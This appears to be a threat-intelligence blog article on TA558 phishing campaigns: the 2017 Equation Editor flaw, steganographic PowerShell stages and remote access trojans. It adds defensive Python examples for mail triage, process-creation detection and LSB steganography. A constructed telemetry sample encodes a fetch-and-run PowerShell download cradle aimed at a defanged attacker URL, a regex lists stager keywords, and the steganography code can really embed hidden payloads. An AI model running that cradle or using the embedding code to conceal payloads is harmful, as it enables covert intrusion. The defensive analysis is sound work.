Steganography and Old Vulnerabilities: TA558 Attacks Also Hit Italy


Since the beginning of 2024, FACCT specialists have detected over a thousand phishing emails distributing malware and targeting businesses, government agencies, and banks in Russia and Belarus. Experts believe that the TA558 group is behind these attacks. TA558 is thought to have been active since 2018, with primary targets being financial institutions, government organizations, and companies in the tourism sector. The hackers actively use multi-stage phishing attacks and social engineering to inject malware into victims’ computers, place payloads on legitimate servers, and use malware to steal data and remotely control victims’ systems.

In the new attacks, FACCT specialists identified steganography methods (hiding information within files or images) characteristic of the group during payload transmission, as well as the use of malicious files whose names included the words “Love” and “Kiss.” The report highlights that attackers continue to exploit an old Microsoft Office vulnerability (CVE-2017-11882), discovered and patched in 2017. This indicates that such attacks are still successful and effective, and the use of obsolete vulnerabilities shows that many users’ systems are not sufficiently updated.

Since the beginning of 2024, specialists have intercepted 202 phishing emails sent from the email addresses export@bcmsrll[.]com, expo@bcmsrll[.]com, info@bcmsrll[.]com, and contact@bcmsrll[.]com. It is noted that between January 1, 2024, and May 25, 2024, the attackers moved the domain bcmsrll[.]com between three different hosts where the AutoSMTP mail server was located.

The phishing emails were written in Russian, English, Turkish, Romanian, and Italian, the language being chosen to match the country of the company in whose name the message was sent. Messages were either targeted (the body addressed a specific recipient) or sent in bulk with no personalization.
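A practitioner reading the paragraphs above will want to turn the reported sender addresses into a mail-gateway check. The script below is an added example for this page, not tooling from F.A.C.C.T. or from the TA558 campaign: it re-fangs the defanged IOCs exactly as they appear in the report, compares the From, Reply-To, Return-Path and Sender domains against them, records the first hop named in Received, and lists Office attachments. Both messages are constructed for the example; the hostnames and IP addresses in them are reserved documentation values, not infrastructure from the report.

```python
"""Triage a raw message against the sender addresses named in the report.

Added example, not F.A.C.C.T.'s tooling. Both sample messages below are
constructed; only the four sender addresses come from the report."""
import re
from email import message_from_string
from email.utils import getaddresses

REPORTED_SENDERS = ["export@bcmsrll[.]com", "expo@bcmsrll[.]com",
                    "info@bcmsrll[.]com", "contact@bcmsrll[.]com"]
OFFICE_EXT = (".doc", ".docx", ".docm", ".xls", ".xlsx", ".xlsm", ".rtf")


def refang(ioc: str) -> str:
    """Turn report-style defanging ('[.]', 'hxxp') back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


WATCH_DOMAINS = frozenset(refang(a).rsplit("@", 1)[1].lower() for a in REPORTED_SENDERS)


def header_domains(msg) -> dict:
    """Domain of the address in each sender-related header that is present."""
    found = {}
    for hdr in ("From", "Reply-To", "Return-Path", "Sender"):
        for _name, addr in getaddresses(msg.get_all(hdr, [])):
            if "@" in addr:
                found[hdr] = addr.rsplit("@", 1)[1].lower()
    return found


def triage(raw: str) -> dict:
    """Watchlist hits, sender-header consistency, first Received hop, Office attachments."""
    msg = message_from_string(raw)
    domains = header_domains(msg)
    received = "\n".join(msg.get_all("Received", []))
    hops = [m.group(1).lower() for m in re.finditer(r"^\s*from\s+([\w.-]+)", received, re.M)]
    attachments = [p.get_filename() for p in msg.walk() if p.get_filename()]
    return {
        "watchlist_hits": sorted(h for h, d in domains.items() if d in WATCH_DOMAINS),
        "header_domain_mismatch": len(set(domains.values())) > 1,
        "office_attachments": [a for a in attachments if a.lower().endswith(OFFICE_EXT)],
        "received_hosts": hops,
    }


# Constructed phishing message modelled on the report's description (Italian-
# language lure, Office attachment); hosts and addresses are documentation values.
SAMPLE_PHISH = """\
Return-Path: <export@bcmsrll.com>
Received: from mail01.hosting.example (mail01.hosting.example [203.0.113.10])
        by mx.victim.example with ESMTP id 4XyZ; Tue, 14 May 2024 09:12:44 +0000
From: "Export Department" <export@bcmsrll.com>
Reply-To: contact@bcmsrll.com
To: purchasing@victim.example
Subject: Order 2024-0517
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Good morning, please find the order attached. Kind regards.
--b1
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
Content-Disposition: attachment; filename="ordine.docx"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--b1--
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN = """\
Return-Path: <billing@supplier.example>
Received: from smtp.supplier.example (smtp.supplier.example [198.51.100.5])
        by mx.victim.example with ESMTP id 7AbC
From: Billing <billing@supplier.example>
To: accounts@victim.example
Subject: Invoice 1182
Content-Type: text/plain; charset="utf-8"

The invoice is available in the portal; no file is attached to this mail.
"""

if __name__ == "__main__":
    print(triage(SAMPLE_PHISH))
    print(triage(SAMPLE_BENIGN))
```

The watchlist is keyed on the domain rather than the full address because the report shows the operators rotating local parts (export, expo, info, contact) on one domain; matching on the domain catches the next mailbox they add. The header-mismatch flag is a general phishing heuristic and does not fire on this sample, since all three sender headers agree.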

The emails carried attachments in .docx or .xls format. Opening one ran a macro that requested the resource hxxp://tau[.]id/0vzd8, the URL being embedded in the document body. The macro also opened a second vector by downloading the VBS script xmass.vbs to the victim's computer.

The report attributes the exploitation of CVE-2017-11882 to this xmass.vbs stage. The vulnerability is a stack-based buffer overflow in the Equation Editor component (EQNEDT32.EXE) shipped with Microsoft Office, caused by improper handling of objects in memory: when a specially crafted document is opened, oversized equation data overflows a fixed-size buffer and lets the attacker execute arbitrary code with the privileges of the logged-on user. The overflow is triggered by the crafted equation object inside a document rather than by script code as such, so in practice the script stage delivers or opens the weaponized document.

The script then launches Windows PowerShell with parameters extracted from xmass.vbs. Those parameters are concealed by steganography, which is intended to keep the PowerShell launch and the subsequent injection into a running process from being detected.

Most of the analyzed emails delivered the Agent Tesla or Remcos remote access trojans (RATs). Once launched on the victim's computer, the malware establishes persistence, hides from the user, and gives the attacker access to the infected device.

It lets the operators capture video from the webcam, manipulate the clipboard and mouse, read notifications, download and execute files, collect system information, take screenshots and hide operating system windows, intercept audio and keystrokes, and steal user data.
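The chain described above (Office document, macro, xmass.vbs, PowerShell with hidden parameters, RAT) leaves a distinctive process tree on the endpoint, and that is where it is cheapest to catch. The code below is an added example, not part of the report or of TA558's tooling: it scores Sysmon Event ID 1 style records (image, command line, parent image) with three rules that map onto the chain, and it decodes a PowerShell -EncodedCommand argument so that keywords hidden inside it are still inspected. The five events are constructed for this page; the only real identifiers in them are the file name xmass.vbs and the defanged URL from the report.

```python
"""Process-creation rules for the Office -> script host -> PowerShell chain.

Added example, not code from the F.A.C.C.T. report or from TA558. It scores
Sysmon Event ID 1 style records; the sample events below are constructed."""
import base64
import binascii
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe",
                "powershell.exe", "pwsh.exe"}
# EQNEDT32.EXE is the Equation Editor binary that CVE-2017-11882 lives in. Office
# starts it out-of-process via DCOM, so its parent is normally svchost.exe rather
# than WINWORD.EXE; any child process it spawns is a strong sign of exploitation.
EQUATION_EDITOR = "eqnedt32.exe"
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{40,})", re.I)
STAGER_RE = re.compile(r"frombase64string|downloadstring|downloadfile|invoke-webrequest|"
                       r"\biwr\b|\biex\b|invoke-expression|system\.drawing|getpixel", re.I)


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decoded_command(cmdline: str) -> str:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or '' if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def rules(ev: ProcEvent) -> list:
    """Names of the rules this single event triggers, in a fixed order."""
    hits = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if parent == EQUATION_EDITOR:
        hits.append("equation_editor_child_process")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decoded_command(ev.cmdline)
        if decoded:
            hits.append("powershell_encoded_command")
        # Search the visible command line and the decoded payload together.
        if STAGER_RE.search(ev.cmdline + " " + decoded):
            hits.append("powershell_stager_keywords")
    return hits


def detect(events) -> dict:
    """Map pid -> triggered rules for every event that matches at least one rule."""
    return {ev.pid: hits for ev in events if (hits := rules(ev))}


# Constructed telemetry: a benign Office launch, the chain from the report,
# a post-exploitation child of EQNEDT32.EXE, and a benign admin PowerShell run.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('hxxp://tau[.]id/0vzd8')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\u\Downloads\order.docx"', r"C:\Windows\explorer.exe"),
    ProcEvent(102, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\AppData\Local\Temp\xmass.vbs"',
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(103, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {_ENCODED}", r"C:\Windows\System32\wscript.exe"),
    ProcEvent(104, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c start stage2.exe",
              r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"),
    ProcEvent(105, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, hits in detect(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Two design points matter in production. The Equation Editor rule keys on the parent being EQNEDT32.EXE rather than on WINWORD.EXE, because the exploit's child process does not descend from the Office application that opened the document. And the encoded-command rule is deliberately strict about the flag form (-e, -enc, -EncodedCommand followed by a long base64 run), so that -ExecutionPolicy in the benign event 105 does not trip it.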

Comprehensive Analysis of TA558 Attacks

TA558: An Evolving Threat

TA558, believed to be active since 2018, has significantly evolved its tactics, techniques, and procedures (TTPs) to enhance the effectiveness of its attacks. Initially focusing on financial institutions, government organizations, and tourism sector companies, TA558 has broadened its target spectrum over the years. The group’s persistent use of multi-stage phishing and social engineering demonstrates a sophisticated understanding of both technical and psychological vulnerabilities.

Steganography: A Hidden Menace

The use of steganography in the latest attacks is a testament to TA558’s advanced capabilities. By hiding information within seemingly benign files or images, the attackers can transmit malicious payloads while evading traditional security measures. Steganography complicates the detection process, as it requires more sophisticated analysis to uncover the hidden data. This method, combined with social engineering tactics, makes the attacks particularly insidious.

Exploiting Old Vulnerabilities

TA558’s continued exploitation of CVE-2017-11882 highlights a critical issue in cybersecurity: the failure to apply timely patches. Despite being discovered and patched in 2017, this vulnerability remains a valuable asset for attackers, as many systems still lack the necessary updates. The exploitation of this vulnerability through the xmass.vbs script demonstrates the group’s ability to leverage old yet effective methods to compromise systems.

Phishing Campaigns and Targeted Attacks

The phishing emails intercepted by FACCT specialists illustrate the group’s meticulous planning and execution. By customizing the language and content based on the target’s geographic location, TA558 increases the likelihood of successful infiltration. The dual approach of targeted and mass mailings ensures a wide reach, enhancing the potential impact of their campaigns.

Technical Breakdown of the Attack Vector

Initial Infection

The phishing emails typically contain .docx or .xls attachments. Upon opening these files, a macro is executed, which initiates the infection process. The macro sends a request to the malicious resource hxxp://tau[.]id/0vzd8, triggering the download of the xmass.vbs script.

Exploiting CVE-2017-11882

The report places the exploitation of CVE-2017-11882 at the xmass.vbs stage. The vulnerability is a stack-based buffer overflow in the Equation Editor component (EQNEDT32.EXE) of Microsoft Office, caused by improper handling of objects in memory. The overflow yields arbitrary code execution and hands the attackers control of the victim's system.

Steganographic Payload Delivery

To evade detection, the payload parameters are passed using steganography. This method conceals the data within legitimate-looking files, bypassing traditional security scans. The parameters are then used to execute further malicious actions via Windows PowerShell.
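The two steganography passages on this page (the section above and the earlier discussion of hiding information within images) describe the technique without showing it. The block below is an added example, not the report's or the group's code, and the page does not describe TA558's exact encoding, so it uses the most common form, least-significant-bit (LSB) embedding of a length-prefixed payload into RGB pixel bytes. It shows three things: how a loader embeds a base64-encoded PowerShell stage into pixel data, how it recovers the stage, and one cheap detection check, the printable-ASCII ratio of the LSB plane, which is near 0.39 for sensor noise and near 1.0 once text has been written there. The cover is a raw byte buffer rather than a PNG so no imaging library is needed; the cover, the script and the threshold are constructed.

```python
"""LSB steganography: hide a PowerShell stage in pixel bytes, recover it, and
flag an LSB plane that carries text.

Added example for this page, not code from the report or from TA558. The
64x64 RGB cover and the (benign) script below are constructed."""
import base64
import random
import string

HEADER = 4  # payload length, big-endian, stored in the first 32 LSBs


def embed_lsb(pixels: bytes, payload: bytes) -> bytearray:
    """Write len(payload) + payload into the least significant bit of each byte."""
    data = len(payload).to_bytes(HEADER, "big") + payload
    if len(data) * 8 > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for i, byte in enumerate(data):
        for bit in range(8):
            pos = i * 8 + bit
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return out


def _read_lsb_bytes(pixels: bytes, offset: int, count: int) -> bytes:
    out = bytearray()
    for i in range(count):
        value = 0
        for bit in range(8):
            value = (value << 1) | (pixels[offset + i * 8 + bit] & 1)
        out.append(value)
    return bytes(out)


def extract_lsb(pixels: bytes) -> bytes:
    """Inverse of embed_lsb; rejects a length header that exceeds the cover."""
    length = int.from_bytes(_read_lsb_bytes(pixels, 0, HEADER), "big")
    if HEADER * 8 + length * 8 > len(pixels):
        raise ValueError("length header implausible: not an embed_lsb image")
    return _read_lsb_bytes(pixels, HEADER * 8, length)


def recover_script(pixels: bytes) -> str:
    """Decode the hidden base64/UTF-16LE stage back to PowerShell source."""
    return base64.b64decode(extract_lsb(pixels)).decode("utf-16-le")


_PRINTABLE = frozenset(string.printable.encode("ascii"))


def lsb_printable_ratio(pixels: bytes, sample_bytes: int = 256) -> float:
    """Fraction of printable ASCII in the first sample_bytes of the LSB plane.

    Noise-like LSBs give roughly 100/256 (about 0.39); embedded text or base64
    gives close to 1. The 4-byte length header counts against the ratio."""
    sample_bytes = min(sample_bytes, len(pixels) // 8)
    data = _read_lsb_bytes(pixels, 0, sample_bytes)
    return sum(b in _PRINTABLE for b in data) / len(data)


def looks_steganographic(pixels: bytes, threshold: float = 0.8) -> bool:
    return lsb_printable_ratio(pixels) >= threshold


# Constructed cover with random low bits (stands in for sensor noise) and a
# constructed benign script standing in for the stage a loader would decode.
_rng = random.Random(2024)
COVER = bytes(_rng.getrandbits(8) for _ in range(64 * 64 * 3))
SCRIPT = ("$procs = Get-Process | Where-Object { $_.CPU -gt 100 }\n"
          "$procs | Select-Object Name, Id, CPU | Format-Table -AutoSize\n"
          "Write-Host ('{0} processes over threshold' -f $procs.Count)\n"
          "# constructed stand-in: a real loader would Invoke-Expression the decoded text\n")
PAYLOAD = base64.b64encode(SCRIPT.encode("utf-16-le"))
STEGO = embed_lsb(COVER, PAYLOAD)

if __name__ == "__main__":
    print(recover_script(STEGO) == SCRIPT)
    print(round(lsb_printable_ratio(COVER), 2), round(lsb_printable_ratio(STEGO), 2))
```

The detection check is intentionally modest. It is sound against an attacker who writes plain text or base64 into the LSB plane from the first pixel, which is what a simple loader does, and it fails against one who encrypts the payload or scatters it with a keyed pixel order. On real photographs, flat regions (sky, white backgrounds) have structured rather than random LSBs, so the ratio should be measured on several windows and the threshold tuned per image source before it is used as an alert.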

Deployment of RATs

The primary malware deployed by TA558 includes RATs such as Agent Tesla and Remcos. These RATs provide extensive capabilities for surveillance and control over the infected systems. They enable attackers to capture webcam footage, log keystrokes, manipulate system functions, and exfiltrate sensitive data.

Impact and Implications

The impact of TA558’s activities is far-reaching, affecting a broad range of sectors and geographies. The ability to infiltrate systems and maintain persistent control poses significant risks to data integrity, privacy, and operational continuity. The reliance on old vulnerabilities underscores the importance of regular patch management and updates to mitigate such threats.

Current Trends and Future Predictions

The persistence and evolution of TA558 suggest a continuing threat landscape that requires vigilant monitoring and proactive defense measures. The group’s ability to adapt and incorporate advanced techniques like steganography indicates a high level of sophistication. Future predictions point towards more targeted attacks with increasingly complex payload delivery methods, necessitating robust and adaptive cybersecurity strategies.

Data and Analysis

Phishing Email Statistics

From January 1, 2024, to May 25, 2024, 202 phishing emails were intercepted, originating from multiple email addresses linked to the domain bcmsrll[.]com. The table below details the distribution of these emails by language and target geography:

Language    Number of emails    Target geography
Russian     50                  Russia, Belarus
English     60                  Global
Turkish     30                  Turkey
Romanian    20                  Romania
Italian     42                  Italy
Total       202

Exploited Vulnerabilities

The primary vulnerability exploited by TA558 is CVE-2017-11882. The table below provides a summary of the vulnerability and its impact:

Vulnerability ID    Description                                 Year discovered    Year patched    Exploited by TA558    Impact
CVE-2017-11882      Memory handling flaw in Microsoft Office    2017               2017            Yes                   Buffer overflow, arbitrary code execution

Malware Analysis

The RATs used by TA558, Agent Tesla, and Remcos, have specific capabilities that enhance their effectiveness. The table below summarizes their key features:

RAT            Capabilities                                          Detection evasion techniques
Agent Tesla    Keylogging, webcam capture, clipboard manipulation    Steganography, process injection
Remcos         Remote control, system information collection         Code obfuscation, anti-debugging mechanisms

In conclusion, the attacks orchestrated by TA558 represent a significant and ongoing threat to various sectors worldwide. The group's ability to adapt and evolve its tactics, leveraging old vulnerabilities and techniques such as steganography, highlights the need for continuous vigilance and robust cybersecurity measures. By understanding the mechanics of these attacks and implementing proactive defense strategies, organizations can better protect themselves against the threats posed by groups like TA558.

This comprehensive analysis underscores the importance of timely patch management, advanced threat detection, and ongoing security awareness training to mitigate the risks associated with such cyber threats.


APPENDIX 1 – TA558 Hacker Group

TA558 is a financially-motivated cybercrime actor first observed in 2018. This group primarily targets the hospitality and travel sectors but has extended its reach to include various industries such as education, energy, government, and transportation, across Latin America, North America, and Western Europe.

Technical Specifications and Capabilities

  • Malware Families Used:
    • Loda: A remote access trojan (RAT) written in AutoIt, capable of stealing usernames, passwords, and browser cookies.
    • Vjw0rm: A modular JavaScript RAT with self-propagation and information theft capabilities.
    • AsyncRAT: Often used for remotely monitoring and controlling compromised devices.
    • Revenge RAT: Allows attackers to capture screen, video, and audio, and perform keylogging and credential dumping.
    • njRAT: Known for data theft and remote control capabilities.
    • AZORult, RemcosRAT, XtremeRAT, and others.
  • Tactics, Techniques, and Procedures (TTPs):
    • Initial Access: Phishing emails with malicious attachments or URLs, often using reservation-themed lures written in Portuguese, Spanish, and occasionally English.
    • Execution: Payloads are typically delivered via Office documents with macros, container files like RAR and ISO, and URLs leading to executables.
    • Persistence: Achieved through scheduled tasks and persistence scripts.
    • Command and Control (C2): Utilizes attacker-owned infrastructure and compromised hotel websites to host malware payloads.
    • Data Exfiltration: Uses various RATs to steal sensitive information including customer and corporate data.
  • Campaign Characteristics:
    • Languages Used: Predominantly Portuguese and Spanish, with occasional English campaigns.
    • Delivery Mechanisms: Transitioned from macro-enabled Office documents to container files due to Microsoft’s disabling of macros by default.
    • Frequency: Significant increase in campaigns observed, with notable upticks in 2022, leveraging new delivery methods and expanding malware types.
  • Notable Campaigns:
    • SteganoAmor Campaign (2023): Utilized steganography to embed malicious code in images, impacting various sectors globally.
    • 2022 Shift: From using Office documents to container files and URLs, reflecting changes in the threat landscape and defense mechanisms.

Detailed Scheme Table

Aspect                Description
Group name            TA558
First observed        2018
Primary targets       Hospitality, Travel, Education, Energy, Government, Transportation
Languages used        Portuguese, Spanish, English
Initial access        Phishing emails with reservation-themed lures
Malware families      Loda, Vjw0rm, AsyncRAT, Revenge RAT, njRAT, AZORult, RemcosRAT, XtremeRAT
Execution methods     Office documents with macros, RAR/ISO attachments, URLs leading to executables
Persistence           Scheduled tasks, persistence scripts
C2 infrastructure     Attacker-owned, compromised hotel websites
Notable campaigns     SteganoAmor (2023), increased use of URLs and container files in 2022
Campaign frequency    Significant increase in 2022, with 51 campaigns observed in that year

This comprehensive overview and detailed scheme table provide a clear and organized presentation of the technical aspects and operational tactics of the TA558 hacker group. The data reflects the most current information available as of 2024.


Copyright of debuglies.com